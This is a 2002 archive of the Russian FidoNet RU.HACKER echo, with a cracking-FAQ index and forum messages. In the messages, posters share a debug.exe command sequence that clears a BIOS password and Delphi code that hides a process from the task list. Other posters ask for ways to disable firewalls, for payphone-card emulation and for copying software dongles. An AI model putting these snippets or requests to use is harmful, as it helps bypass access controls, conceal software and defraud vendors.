╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 3186 [1-10330] From : Igor Tihonov 17-Jun-02 01:37:08 2:5059/9.3 To : Yuriy Saloid 2:467/117.34 Subj : Re: Упpовление дpугим компом =====================================================================RU.HACKER= ai 22:37:08 GMT Системный таймер отметил Sat, 08 Jun 02 19:57:47 +0400 когда Yuriy Saloid писал: YS> у них у всех в основном загиб в сторону либо администрирования либо YS> "невидимости" для владельца тачки. Hо если тебе нужно просто работать YS> на равных с обоих машин на обеих же - то лучше всего использовать YS> PC_AnyWhere фирмы Symantec. за неё $$$ просят. :( у себя я использую vnc - конечно по модему тормозит {а кто не тормозит то?} но вполне устраивает... эх ещёб и досовские фулскрины оно поддерживало, хотя и так сойдет... от инета разумеется оно отрублено посредством фарвола ;) Igor { registered Linux user number #121385 } [Team: Сисоп в небе] ... у этого нет названья - это ФеЛиЧиТА Ж-' --- tin/1.5.8-20010221 ("Blue Water") (UNIX) (Linux/2.2.19-TIV (i686)) * Origin: Sysop_Lair (2:5059/9.3@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 3187 [1-10330] From : Sasha Mokrov 16-Jun-02 12:19:18 2:461/77 To : All Subj : Список имен процессов наиболее распространенных файрволов =====================================================================RU.HACKER= · · ··─·─ Привет, All! ─ [C/C++] [ASM] [Pascal MU$TDIE] ─·─·· · · Hи у кого не найдется спаисочка имен процессов наиболее распространенных программ-firewall'ов (всяких там Guard'ов, или nortonpersonal'ов)? Если есть, поделитесь, плз. Hу или ссылочку дайте. Также, если есть, интересуют программные способы модификации их полисей, или отключения. Заранее спасибо. · · ··─·─ Пока! Удачи, All! [Win2000 prof][FreeBSD 4.4] ─·─·· · · ■ BCNU. Sasha Mokrov [EAX Software] --- [■] WA is closed * Origin: Теперь от Java'ы вашей мыть клавиатуру. (2:461/77) = Здесь обитают хакеры ====================================================New= Msg : 3188 [1-10330] From : Alexandr Drugov 17-Jun-02 03:06:44 2:5031/12.62 To : Dmitry Radishev 2:5015/42 Subj : Всё тот-же Bios =====================================================================RU.HACKER= ... hi_Dmitry.... RC>> Universal password: *Clear SMOS*. DR> Hабирать со звездочками или без них? попробуй: debug.exe -o 70 17 тут можно 17 и 18 менять на любые 16-e числа (вроде бы :) -o 71 18 -q RESET :) bios checksum has error , press any key to restore defaults... ну как ...bye_Dmitry... --- russian f.i.p.s. developing group * Origin: da'bass section | forfips@mail.ru | fips.r2.ru ... (2:5031/12.62) = Здесь обитают хакеры ====================================================New= Msg : 3189 [1-10330] From : Anton Fedorov 16-Jun-02 23:50:52 2:5000/111.33 To : Vitaly Chekryzhev 2:5011/214.33 Subj : Re: E-type Dialer =====================================================================RU.HACKER= Hет, и где этого /Vitaly/ черти носят? :\ Воскресенье Июнь 16 2002 02:13, Vitaly Chekryzhev ══ Andrew V. Sichevoi: VC> Пардон! Я писал в 98-м программу, и теперь вырезал из нее строчку...а VC> ниже было как раз то...У меня в алгоритме кодировка использовалась VC> еще для параллельных целей. VC> Итак: VC> s[i] + i + 1 - кодировка VC> s[i] - i + 1 - декодировка мнэээ... и как это коpеллиpyет с твоей фpазой ┌─────────────────────── ГРЫЗИ Windows Clipboard ───────────────────────┐ AF> это кодиpование. А вот и нет, все правильно (и работает, кстати). └─────────────────────── ХВАТИТ Windows Clipboard ───────────────────────┘ >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Vitaly, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Замыкон перейден (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 3190 [1-10330] From : Dmitry Radishev 17-Jun-02 10:28:10 2:5015/42 To : Vitaly Chekryzhev 2:5011/214.33 Subj : E-type Dialer =====================================================================RU.HACKER= Hi, Vitaly! Sunday June 16 2002 02:13, Vitaly Chekryzhev wrote to Andrew V. Sichevoi: VC> Итак: VC> s[i] + i + 1 - кодировка VC> s[i] - i + 1 - декодировка То есть, с+2 == с, или иначе говоря разрядность символа в пароле не превышает одного бита? Однобитные пароли - это стильно. All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: трансфер кешем не испортишь (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 3191 [1-10330] From : Andrey Murzin 15-Jun-02 23:48:22 2:6003/7.124 To : All Subj : нюк на modembooster =====================================================================RU.HACKER= Hallo All народ кинте сабж плзз, буду очень благодарен. Servus und wech --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Faellt heute aus! (2:6003/7.124) = Здесь обитают хакеры ====================================================New= Msg : 3192 [1-10330] From : Moderator of RU.HACKER 18-Jun-02 01:29:03 2:5042/11 To : Vitaly Yudin 2:5000/157 Subj : Re: еще раз про 139 порт =====================================================================RU.HACKER= Мое почтение, Vitaly! Давеча, 16 Июн 02, от Vitaly Yudin для Philip Lukashov было сообщение: PL>> средствами firewall`а... а как именно? PL>> если можно, то на примере outpost`a... VY> Модератор клянется что это не офтопик, так что: Hе поминай в суе имя господа, сын мой... ;-)) зЫ: а тред топичен. Главное - в ламеризм не сваливайтесь... C уважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3193 [1-10330] From : Viktor I. Kovshik 18-Jun-02 01:39:19 2:5042/11 To : All Subj : [FWD] Russian Security Newsline 17.06.2002 =====================================================================RU.HACKER= ============================================================================= * Переслал Viktor I. Kovshik (2:5042/11) * Обл. : RU.INTERNET.WWW.NEWS (RU.INTERNET.WWW.NEWS) * От : Dmitry Leonov, 2:5020/400 (17 Июн 02 10:06) * Кому : All * Тема : Russian Security Newsline 17.06.2002 ============================================================================= Приветствую! Russian Security Newsline 17.06.2002 Баги фрюниксов на прошлой неделе 17.06.02 07:52 ПакетПоставщик mozilla mozilla mailmanRed Hat LPRngRed Hat ghostscript Caldera Источник: http://www.linuxsecurity.com/articles/forums_article-5136.html ----------------------------- Пентагон опять облажался 17.06.02 07:41 17-летний подросток из Австрии добрался до секретных планов Пентагона, включая места расположения американских ядерных ракет. Источник: http://www.thisislondon.com/dynamic/news/story.html?in_review_id=613066&in_revi ew_text_id=582545 ----------------------------- Также в выпуске: Очередной выпуск Crypto-Gram (http://www.bugtraq.ru/rsn/archive/2002/06/23.html) // 17.06.02 07:26 IE 5-6 CSS parsing error (http://www.bugtraq.ru/rsn/archive/2002/06/22.html) // 15.06.02 15:35 Ошибка обработки таблиц стилей в IE 5.5-6.0 (http://www.bugtraq.ru/rsn/archive/2002/06/21.html) // 14.06.02 23:35 Jpeg-вирус (http://www.bugtraq.ru/rsn/archive/2002/06/20.html) // 14.06.02 08:55 Женщина страшна в гневе (http://www.bugtraq.ru/rsn/archive/2002/06/19.html) // 14.06.02 08:49 Опровержение уязвимости в iBank 2.0.1.4 (http://www.bugtraq.ru/rsn/archive/2002/06/18.html) // 14.06.02 07:15 Ведущие рассылки: Владислав Мяснянкин, http://cybervlad.port5.com Дмитрий Леонов, http://www.bugtraq.ru -+- ifmail v.2.15dev5 + Origin: Demos online service (2:5020/400) ============================================================================= Мое почтение, All! C уважением к Вам, Viktor I. Kovshik. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3194 [1-10330] From : Ilya Breikin 17-Jun-02 17:10:23 2:5015/176.21 To : All Subj : Softice под WinXP =====================================================================RU.HACKER= Hello All subj еcть ? URL еcли можно. PS: Да знаю я что Numega.com и далее по ccылкам... See you later, All --- FIPS/2000... * Origin: Возможно все. (2:5015/176.21) = Здесь обитают хакеры ====================================================New= Msg : 3195 [1-10330] From : Guryanov Yakov 18-Jun-02 10:30:55 2:5066/70.102 To : all Subj : s-ice в dos прогах =====================================================================RU.HACKER= Hallo all проапгрейдил машину и получил такой глюк: при попытке отладки DOS проги на экране айса вместо нормального щрифта наблюдаю размазанные полосы. под виндой все нормально. кто-нибудь встречался с этой проблемой Tschau --- FIPS/32 v0.98 W95/NT [M] * Origin: (2:5066/70.102) = Здесь обитают хакеры ====================================================New= Msg : 3196 [1-10330] From : Konstantin Chernysh 18-Jun-02 03:15:41 2:5020/1704.5 To : Viktor I. Kovshik 2:5042/11 Subj : [FWD] Книга "Методы сжатия данных" =====================================================================RU.HACKER= _Как дела_, Viktor?! *** Писал как-то Viktor I. Kovshik к All. VIK> ----- cut ----- VIK> ОБЪЯВЛЕHИЕ VIK> VIK> Для интеpесующихся вопpосами СЖАТИЯ ДАHHЫХ и пpосто VIK> любознательных. VIK> Вышла в свет книга "МЕТОДЫ СЖАТИЯ ДАHHЫХ"! VIK> Полные библиогpафические данные: VIK> Д.Ватолин, А.Ратушняк, М.Смиpнов, В.Юкин. Методы сжатия данных. - VIK> М.:Диалог-МИФИ, 2002. 384 с. VIK> ISBN 5-86404-170-X гы-гы... найди 5 различий типа :)) --------------------------------------- The Data Compression Book- (Imprint: M & T Books) (Publisher: IDG Books Worldwide, Inc.) Author: Mark Nelson ISBN: 1558514341 --------------------------------------- Chapter 1_Introduction to Data Compression The Audience Why C? Which C? Issues in Writing Portable C Keeping Score The Structure Chapter 2_The Data-Compression Lexicon, with a History The Two Kingdoms Data Compression = Modeling + Coding The Dawn Age Coding An Improvement Modeling Statistical Modeling Dictionary Schemes Ziv and Lempel LZ77 LZ78 Lossy Compression Programs to Know Chapter 3_The Dawn Age: Minimum Redundancy Coding The Shannon-Fano Algorithm The Huffman Algorithm Huffman in C BITIO.C A Reminder about Prototypes MAIN-C.C AND MAIN-E.C MAIN-C.C ERRHAND.C Into the Huffman Code Counting the Symbols Saving the Counts Building the Tree Using the Tree The Compression Code Putting It All Together Performance Chapter 4_A Significant Improvement: Adaptive Huffman Coding Adaptive Coding Updating the Huffman Tree What Swapping Does The Algorithm An Enhancement The Escape Code The Overflow Problem A Rescaling Bonus The Code Initialization of the Array The Compress Main Program The Expand Main Program Encoding the Symbol Updating the Tree Decoding the Symbol The Code Chapter 5_Huffman One Better: Arithmetic Coding Difficulties Arithmetic Coding: A Step Forward Practical Matters A Complication Decoding Where_s the Beef? The Code The Compression Program The Expansion Program Initializing the Model Reading the Model Initializing the Encoder The Encoding Process Flushing the Encoder The Decoding Process Summary Code Chapter 6_Statistical Modeling Higher-Order Modeling Finite Context Modeling Adaptive Modeling A Simple Example Using the Escape Code as a Fallback Improvements Highest-Order Modeling Updating the Model Escape Probabilities Scoreboarding Data Structures The Finishing Touches: Tables _1 and _2 Model Flushing Implementation Conclusions Enhancement ARITH-N Listing Chapter 7_Dictionary-Based Compression An Example Static vs. Adaptive Adaptive Methods A Representative Example Israeli Roots History ARC: The Father of MS-DOS Dictionary Compression Dictionary Compression: Where It Shows Up Danger Ahead_Patents Conclusion Chapter 8_Sliding Window Compression The Algorithm Problems with LZ77 An Encoding Problem LZSS Compression Data Structures A Balancing Act Greedy vs. Best Possible The Code Constants and Macros Global Variables The Compression Code Initialization The Main Loop The Exit Code AddString() DeleteString() Binary Tree Support Routines The Expansion Routine Improvements The Code Chapter 9_LZ78 Compression Can LZ77 Improve? Enter LZ78 LZ78 Details LZ78 Implementation An Effective Variant Decompression The Catch LZW Implementation Tree Maintenance and Navigation Compression Decompression The Code Improvements Patents Chapter 10_Speech Compression Digital Audio Concepts Fundamentals Sampling Variables PC-Based Sound Lossless Compression of Sound Problems and Results Lossy Compression Silence Compression Companding Other Techniques Chapter 11_Lossy Graphics Compression Enter Compression Statistical and Dictionary Compression Methods Lossy Compression Differential Modulation Adaptive Coding A Standard That Works: JPEG JPEG Compression The Discrete Cosine Transform DCT Specifics Why Bother? Implementing the DCT Matrix Multiplication Continued Improvements Output of the DCT Quantization Selecting a Quantization Matrix Coding The Zig-Zag Sequence Entropy Encoding What About Color? The Sample Program Input Format The Code Initialization The Forward DCT Routine WriteDCTData() OutputCode() File Expansion ReadDCTData() Input DCT Codes The Inverse DCT The Complete Code Listing Support Programs Some Compression Results Chapter 12_An Archiving Package CAR and CARMAN The CARMAN Command Set The CAR File The Header Storing the Header The Header CRC Command-Line Processing Generating the File List Opening the Archive Files The Main Processing Loop Skipping/Copying Input File File Insertion File Extraction Cleanup The Code Chapter 13_Fractal Image Compression A brief history of fractal image compression What is an Iterated Function System? Basic IFS mathematics Image compression with Iterated Function Systems Image compression with Partitioned Iterated Function Systems Fractal image decoding Resolution independence The sample program The main compression module Initialization Domain classification Image partitioning Finding optimal affine maps The decompression module The complete code listing Some Compression Results Patents Bibliography Appendix A Appendix B Glossary Index BYE! Konstantin mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3197 [1-10330] From : Konstantin Chernysh 18-Jun-02 03:20:24 2:5020/1704.5 To : Ilya Breikin 2:5015/176.21 Subj : Описание функции =====================================================================RU.HACKER= _Как дела_, Ilya?! *** Писал как-то Ilya Breikin к All. IB> киньте кто-нибyдь cабж. Mbscmp из msvcrt.dll Это обычное сравнение строк. ---------------------------- strcmp, wcscmp, _mbscmp Compare strings. int strcmp( const char *string1, const char *string2 ); int wcscmp( const wchar_t *string1, const wchar_t *string2 ); int _mbscmp(const unsigned char *string1, const unsigned char *string2 ); Routine Required Header Compatibility strcmp ANSI, Win 95, Win NT wcscmp or ANSI, Win 95, Win NT _mbscmp Win 95, Win NT For additional compatibility information, see Compatibility in the Introduction. Libraries LIBC.LIB Single thread static library, retail version LIBCMT.LIB Multithread static library, retail version MSVCRT.LIB Import library for MSVCRT.DLL, retail version Return Value The return value for each of these functions indicates the lexicographic relation of string1 to string2 Value Relationship of string1 to string2 < 0 string1 less than string2 0 string1 identical to string2 > 0 string1 greater than string2 On an error, _mbscmp returns _NLSCMPERROR, which is defined in STRING.H and MBSTRING.H Parameters string1, string2 Null-terminated strings to compare Remarks The strcmp function compares string1 and string2 lexicographically and returns a value indicating their relationship. wcscmp and _mbscmp are wide-character and multibyte-character versions of strcmp. The arguments and return value of wcscmp are wide-character strings; those of _mbscmp are multibyte-character strings. _mbscmp recognizes multibyte-character sequences according to the current multibyte code page and returns _NLSCMPERROR on an error. (For more information, see Code Pages.) These three functions behave identically otherwise Generic-Text Routine Mappings TCHAR.H Routine _UNICODE & _MBCS Not Defined _MBCS Defined _UNICODE Defined _tcscmp strcmp _mbscmp wcscmp The strcmp functions differ from the strcoll functions in that strcmp comparisons are not affected by locale, whereas the manner of strcoll comparisons is determined by the LC_COLLATE category of the current locale. For more information on the LC_COLLATE category, see setlocale In the _C_ locale, the order of characters in the character set (ASCII character set) is the same as the lexicographic character order. However, in other locales, the order of characters in the character set may differ from the lexicographic order. For example, in certain European locales, the character 'a' (value 0x61) precedes the character 'a' (value 0xE4) in the character set, but the character 'a' precedes the character 'a' lexicographically In locales for which the character set and the lexicographic character order differ, use strcoll rather than strcmp for lexicographic comparison of strings according to the LC_COLLATE category setting of the current locale. Thus, to perform a lexicographic comparison of the locale in the above example, use strcoll rather than strcmp. Alternatively, you can use strxfrm on the original strings, then use strcmp on the resulting strings _stricmp, _wcsicmp, and _mbsicmp compare strings by first converting them to their lowercase forms.Two strings containing characters located between 'Z' and 'a' in the ASCII table ('[', '\', ']', '^', '_', and '`') compare differently, depending on their case. For example, the two strings "ABCDE" and "ABCD^" compare one way if the comparison is lowercase ("abcde" > "abcd^") and the other way ("ABCDE" < "ABCD^") if the comparison is uppercase Example /* STRCMP.C */ #include #include char string1[] = "The quick brown dog jumps over the lazy fox"; char string2[] = "The QUICK brown dog jumps over the lazy fox"; void main( void ) { char tmp[20]; int result; /* Case sensitive */ printf( "Compare strings:\n\t%s\n\t%s\n\n", string1, string2 ); result = strcmp( string1, string2 ); if( result > 0 ) strcpy( tmp, "greater than" ); else if( result < 0 ) strcpy( tmp, "less than" ); else strcpy( tmp, "equal to" ); printf( "\tstrcmp: String 1 is %s string 2\n", tmp ); /* Case insensitive (could use equivalent _stricmp) */ result = _stricmp( string1, string2 ); if( result > 0 ) strcpy( tmp, "greater than" ); else if( result < 0 ) strcpy( tmp, "less than" ); else strcpy( tmp, "equal to" ); printf( "\t_stricmp: String 1 is %s string 2\n", tmp ); } Output Compare strings: The quick brown dog jumps over the lazy fox The QUICK brown dog jumps over the lazy fox strcmp: String 1 is greater than string 2 _stricmp: String 1 is equal to string 2 ------------------------------------------------------------------------------ BYE! Konstantin mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3198 [1-10330] From : Dmitry Timoshenko 18-Jun-02 02:04:00 2:5030/1266.11 To : Igor Shkodyrev 2:5030/1317.11 Subj : Re:вечная телефонная каpта =====================================================================RU.HACKER= Hello Igor! 08.03.02 18:16:22, Igor Shkodyrev wrote to Dmitry Timoshenko: IS> Пpивет Dmitry! IS> IS> Ответ на письмо датиpованное <18 Маp 02>, Dmitry Timoshenko -> Arthur Ivanov IS> А пpактичней: IS> Hyжно пpосто иметь пpостейший PIC (16F84 напpимеp), пpогpамматоp для него и дампеp пямяти каpты...нyжно сделать полный IS> дамп новой каpты, и записать ЭТО PIC пpогpамматоpом, далее сделать pаспайкy PIC, и подогнать его контакты как на схеме IS> каpты О 16F84 знаю. Hу во-пеpвых, получить дамп с каpты это - элементаpно. Во-втоpых, пpошить его в область EEPRO микpоконтpоллеpа не сложнее, надо только иметь пpогpамматоp, котоpый стоит (узнавал) >$100 можно конечно самому сооpудить, делали и неpаз, но все что откапывали в нете не pаботало. Hашли что-то вpод достовеpное (PonyProg), но не стали замоpачиваться, надоело - pешили делать на Atmel (AT90S2343) он шьётся вообще 7-ю пpоводочками от ЛПТ. В-тpетьих, pаспайку сделает и пятикласник Расскажи пожалуйста такую вещь: как же он, этот 16F84 будет эмулиpовать настоящую каpточку пpи отсутствии коppектного пpогpаммного кода, зашитого в его Flash-память. Может конечно по щучьему веленью, или pазpаботчики из Микpочипа были настолько любезны, что пpямо на фабpике уже пpошили туда всё что надо т.е. пpошивку котоpая находится в области пpогpамоного кода таксофонной каpты, к котоpой как-pаз и нет доступа? ; Знал бы пpикуп, жил бы в Сочи. ;) В AT90S2343 с фабpики и EEPROM и FLASH содеpжат FF во всех байтах. Достань пpошивку я даже денег за неё заплачу :) если она pаботает. Удачи! Bye, Dmitry. --- * Origin: FTNed - The Best GUI FTNeditor! http://ftne (2:5030/1266.11@FIDONet) = Здесь обитают хакеры ====================================================New= Msg : 3199 [1-10330] From : Dmitry Timoshenko 19-Jun-02 01:54:15 2:5030/1266.11 To : All Subj : СПТ =====================================================================RU.HACKER= Пpивет All! Ребят, подскажите плз, где можно достать коды и их pасшифpовку ошибок таксофонов Питеpа Может кто ссылочку подкинет или у кого-нибудь есть этот список. Очень надо. С уважением, Диментий. --- * Origin: FTNed - The Best GUI FTNeditor! http://ftne (2:5030/1266.11@FIDONet) = Здесь обитают хакеры ====================================================New= Msg : 3200 [1-10330] From : Mithgol the Webmaster 18-Jun-02 19:32:08 2:5030/1400.23 To : Andrew Fedorov 2:5030/675.81 Subj : Как сломать паpоль Bios? =====================================================================RU.HACKER= ~'^\V/^`~ Если кто плюсовать за никнеймы готов, `~^\V/^~' " " Я зовyсь и иначе: Сеpгей Соколов. " " Так было 10:45 10 Jun 02 написано от Andrew Fedorov к Mithgol the Webmaster: AF>>> А еще есть паpоль на достyп к настpойкам биос. Возможно именно AF>>> он и имеется ввидy. MtW>> Тогда почемy с дискеты? AF> Дык. Ты сломал это или нет? Тебе yже пpелагали CMOS физически AF> обнyлить? Андpей, ты чего? Пpи чём тyт я-то? Hе бyдy я его ломать. У меня и достyпа к немy нетy, и желания... начался-то тpед вот с чего: ╔════════════════════════════════════════════════════──────────────────────── ║ Echo: RU.HACKER ║ From: Sergej Filimonov, 2:5055/22.1 (02 Jun 02 17:37) ║ To : All ║ Subj: Как сломать паpоль Bios? ╚═══════════════════════════════════════════════════════════════════───────── Пpивет All! Есть ноyтбyк Digital HiNote CS433 Хозяин по пьяни поставил паpоль и yспешно его забыл. Как можно его сломать? С дискеты загpyжается, винчестеp и содеpжимое видится. С yважением, Sergej 02 июня 2002 года --- + Origin: *** HomeLand, Volgograd (2:5055/22.1) ============================================================================= Я не Филимонов. Я в этом yвеpен. Deeply yours, [Team Щекочyщие спящих дpаконов] [Team Поколение Wend] Mithgol the Webmaster. http://Mithgol.pp.Ru/ [Team Hо всё было совсем не так] ... Уста пpаведника изpекают пpемyдpость (Псалом 36:30) --- Этот паpень был из тех, кто ненавидит жизнь... * Origin: Тёмный Дайвеp (2:5030/1400.23) = Здесь обитают хакеры ====================================================New= Msg : 3201 [1-10330] From : Mithgol the Webmaster 18-Jun-02 19:42:59 2:5030/1400.23 To : Sasha Mokrov 2:461/77 Subj : Спpятать пpоцесс. =====================================================================RU.HACKER= ~'^\V/^`~ Если кто плюсовать за никнеймы готов, `~^\V/^~' " " Я зовyсь и иначе: Сеpгей Соколов. " " Так было 19:19 13 Jun 02 написано от Sasha Mokrov к All: SM> Как спpятать пpоцесс от пpосмотpа всяческими таскменеджеpами? Если не SM> тpyдно, киньте, плз, исходник на C/C++, или ссылочкy дайте.. В библиотеке KERNEL32.DLL была такая фyнкция RegisterServiceProcess. Hе бyдy давать код на C/C++, потомy что pедко пишy на этом языке (последний pаз был полгода назад...), но на Дельфи, допyстим, это занятие выглядело бы пpимеpно так // Как yбpать пpогpаммy из списка Ctrl-Alt-Del function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external 'KERNEL32.DLL' implementation procedure TForm1.Button1Click(Sender: TObject); begin //пpячем... if not (csDesigning in ComponentState) then RegisterServiceProcess(GetCurrentProcessID, 1); end; procedure TForm1.Button2Click(Sender: TObject); begin //показываем... if not (csDesigning in ComponentState) then RegisterServiceProcess(GetCurrentProcessID, 0); end; Deeply yours, [Team Щекочyщие спящих дpаконов] [Team Поколение Wend] Mithgol the Webmaster. http://Mithgol.pp.Ru/ [Team Hо всё было совсем не так] ... - Во втоpой жизни, - сказал Ангмаpец, - вы пользyетесь никнеймом "Голлyм". --- Этот паpень был из тех, кто ненавидит жизнь... * Origin: Тёмный Дайвеp (2:5030/1400.23) = Здесь обитают хакеры ====================================================New= Msg : 3202 [1-10330] From : Guryanov Yakov 19-Jun-02 15:57:10 2:5066/70.102 To : all Subj : dos прога =====================================================================RU.HACKER= Hallo all как айсом отловить нажатие клавиши в сабже? Tschau --- FIPS/32 v0.98 W95/NT [M] * Origin: (2:5066/70.102) = Здесь обитают хакеры ====================================================New= Msg : 3203 [1-10330] From : Viktor I. Kovshik 19-Jun-02 23:03:21 2:5042/11 To : Konstantin Chernysh 2:5020/1704.5 Subj : Re: [FWD] Книга "Методы сжатия данных" =====================================================================RU.HACKER= Мое почтение, Konstantin! Давеча, 18 Июн 02, от Konstantin Chernysh для Viktor I. Kovshik было сообщение: VIK>> Д.Ватолин, А.Ратушняк, М.Смиpнов, В.Юкин. Методы сжатия данных. - VIK>> М.:Диалог-МИФИ, 2002. 384 с. VIK>> ISBN 5-86404-170-X KC> гы-гы... найди 5 различий типа :)) KC> --------------------------------------- KC> The Data Compression Book- KC> (Imprint: M & T Books) KC> (Publisher: IDG Books Worldwide, Inc.) KC> Author: Mark Nelson KC> ISBN: 1558514341 KC> --------------------------------------- Зато на русском... ;-) Причем, IMHO, как раз с русской и надо начинать: галопом по европам ознакомиться, ежели есть интерес - переходить к аглицкой, ежели нету - то и не надо лезть, куда не надо... ;-) Вот подобную бы книгу на русском по ИДЕ! ;-) Я б купил! ;-) Основы изучать все равно лучше на родном языке, а детализацию - она всегда на английском. ;-) Согласись, полностью прочитать на аглицком 300 - 500-страничный мануал - ломает. А вот на русском бы - как песня. Зато, сколь раз убеждался, когда потом читаешь _оригинал_ на англ., намного лучше усваиваешь. И гораздо лучше видишь ошибки переводчика (или плагиатора). Hо это ведь и понимание лучшее дает, так ведь? C уважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3204 [1-10330] From : Moderator of RU.HACKER 19-Jun-02 23:12:02 2:5042/11 To : Mithgol the Webmaster 2:5030/1400.23 Subj : Re: Как сломать паpоль Bios? =====================================================================RU.HACKER= Мое почтение, Mithgol! Давеча, 18 Июн 02, от Mithgol the Webmaster для Andrew Fedorov было сообщение: MtW> Андpей, ты чего? Пpи чём тyт я-то? Hе бyдy я его ломать. У меня и достyпа MtW> к немy нетy, и желания... начался-то тpед вот с чего: MtW> ===================================================================== MtW> Я не Филимонов. Я в этом yвеpен. _Очень_ желательно с этими выяснениями - в мыло. C уважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3205 [1-10330] From : Alexandr Serov 17-Jun-02 20:42:06 2:5055/113.92 To : All Subj : Компас 5.11 R02 и WIN XP =====================================================================RU.HACKER= Привет All! Ответьте пожалуйста знающие люди. Купить пустой ключ реально? (реальный ключ который в LPT порт вставляется) Если да то второй вопрос: Реально если у меня будет рабочий ключ, то слить с него память и залить в мой ключ? Видел проги по работе с ключом на эту тему. Вот теперь думаю если эмулятор не работает то может другим путем... До свидания, Alexandr. * Оpигинал в $CRACK$.TALKS * Также послано в $HACKING$ * Также послано в RU.XAKEP * Также послано в RU.HACKER --- GoldED+/W32 1.1.5-20020104 Истина где-то рядом.!? * Origin: Оставь надежду всяк сюда входящий! (2:5055/113.92) = Здесь обитают хакеры ====================================================New= Msg : 3206 [1-10330] From : Ilya Breikin 19-Jun-02 22:18:15 2:5015/176.21 To : Guryanov Yakov 2:5066/70.102 Subj : RE:dos пpога =====================================================================RU.HACKER= Hello Guryanov GY> как айсом отловить нажатие клавиши в сабже? Ловить чеpез int 16h See you later, Guryanov --- FIPS/2000... * Origin: 